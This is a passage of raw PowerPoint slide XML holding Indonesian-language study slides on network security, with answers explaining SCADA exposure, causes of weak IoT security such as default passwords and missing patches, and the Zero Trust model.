              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aliran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengawasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Karena </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>butuh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What are some factors contributing to the poor security characteristics of IoT devices?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Faktor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemahnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Weak/default passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Lack of regular updates/patching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produsen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Resource constraints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Insecure communication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Poor network segmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diletakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diproduksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>murah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target botnet (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Mirai).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What is a network security approach that shifts the focus from defending a network’s boundaries to protecting individual resources and data within the network?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Zero Trust Security Model.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>📌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>"Never trust, always verify."</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diotorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>divalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus-menerus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: multi-factor authentication (MFA), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>microsegmentation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, least privilege access, dan continuous monitoring.</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149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1291353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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
